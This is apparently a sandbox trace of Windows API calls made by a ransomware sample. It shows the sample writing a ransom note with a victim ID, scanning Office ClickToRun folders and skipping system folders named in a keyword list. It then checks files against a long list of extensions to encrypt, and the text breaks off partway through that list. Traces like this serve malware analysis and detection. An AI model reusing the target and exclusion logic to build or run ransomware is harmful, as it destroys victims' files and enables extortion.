	[0158.970] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.970] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0158.971] CloseHandle (hObject=0x388) returned 1
	[0158.971] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7846237e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0158.972] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*.*") returned 80
	[0158.972] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.972] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\*.*", cchLength=0x50 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*") returned 0x50
	[0158.972] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.972] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="windows") returned 0x0
	[0158.972] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.973] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="boot") returned 0x0
	[0158.973] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.973] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="system volume information") returned 0x0
	[0158.973] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.973] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.973] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.973] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="temp") returned 0x0
	[0158.974] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.974] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="program files") returned 0x0
	[0158.974] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.974] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.974] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.974] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="appdata") returned 0x0
	[0158.974] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.975] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="application data") returned 0x0
	[0158.975] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.975] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="winnt") returned 0x0
	[0158.975] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.975] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="tmp") returned 0x0
	[0158.975] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.976] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="cache") returned 0x0
	[0158.976] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.976] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.976] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.976] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="webcache") returned 0x0
	[0158.976] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.977] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="inetcache") returned 0x0
	[0158.977] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.977] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="nvidia") returned 0x0
	[0158.977] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.977] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="packages") returned 0x0
	[0158.977] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.991] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="cookies") returned 0x0
	[0158.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.991] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\*.*", lpSrch="programdata") returned 0x0
	[0158.991] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0158.991] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0158.991] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b641eb6, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7846237e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.992] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0158.992] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f5640, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b5f5640, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-us.16", cAlternateFileName="")) returned 1
	[0158.992] lstrcmpW (lpString1="en-us.16", lpString2="..") returned 1
	[0158.992] lstrcmpW (lpString1="en-us.16", lpString2=".") returned 1
	[0158.992] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE"
	[0158.992] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\"
	[0158.992] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\", lpString2="en-us.16" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16"
	[0158.993] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16"
	[0158.993] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\"
	[0158.993] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\"
	[0158.993] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*.*"
	[0158.995] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f5640, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b5f5640, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0159.002] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*.*") returned 89
	[0159.002] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0159.003] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*") returned 0x59
	[0159.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.003] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="windows") returned 0x0
	[0159.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.003] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="boot") returned 0x0
	[0159.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.003] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="system volume information") returned 0x0
	[0159.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.004] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0159.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.004] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="temp") returned 0x0
	[0159.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.004] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="program files") returned 0x0
	[0159.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.005] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="program files (x86)") returned 0x0
	[0159.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.005] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="appdata") returned 0x0
	[0159.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.005] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="application data") returned 0x0
	[0159.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.006] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="winnt") returned 0x0
	[0159.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.006] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="tmp") returned 0x0
	[0159.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.006] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="cache") returned 0x0
	[0159.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.007] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="temporary internet files") returned 0x0
	[0159.007] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.007] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="webcache") returned 0x0
	[0159.007] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.007] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="inetcache") returned 0x0
	[0159.007] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.008] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="nvidia") returned 0x0
	[0159.008] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.008] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="packages") returned 0x0
	[0159.008] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.008] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="cookies") returned 0x0
	[0159.008] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.009] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="programdata") returned 0x0
	[0159.009] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f5640, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b5f5640, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="..", cAlternateFileName="")) returned 1
	[0159.009] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f0737, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f0737, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x22d02900, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x5765, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="MasterDescriptor.en-us.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0159.009] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2="..") returned 1
	[0159.010] lstrcmpW (lpString1="MasterDescriptor.en-us.xml", lpString2=".") returned 1
	[0159.010] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\"
	[0159.010] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\", lpString2="MasterDescriptor.en-us.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml"
	[0159.010] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml") returned 112
	[0159.010] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0159.010] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\MasterDescriptor.en-us.xml", cchLength=0x70 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml") returned 0x70
	[0159.010] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.011] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0159.011] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml") returned="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml"
	[0159.011] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\masterdescriptor.en-us.xml") returned 112
	[0159.011] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.012] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0159.012] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.012] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft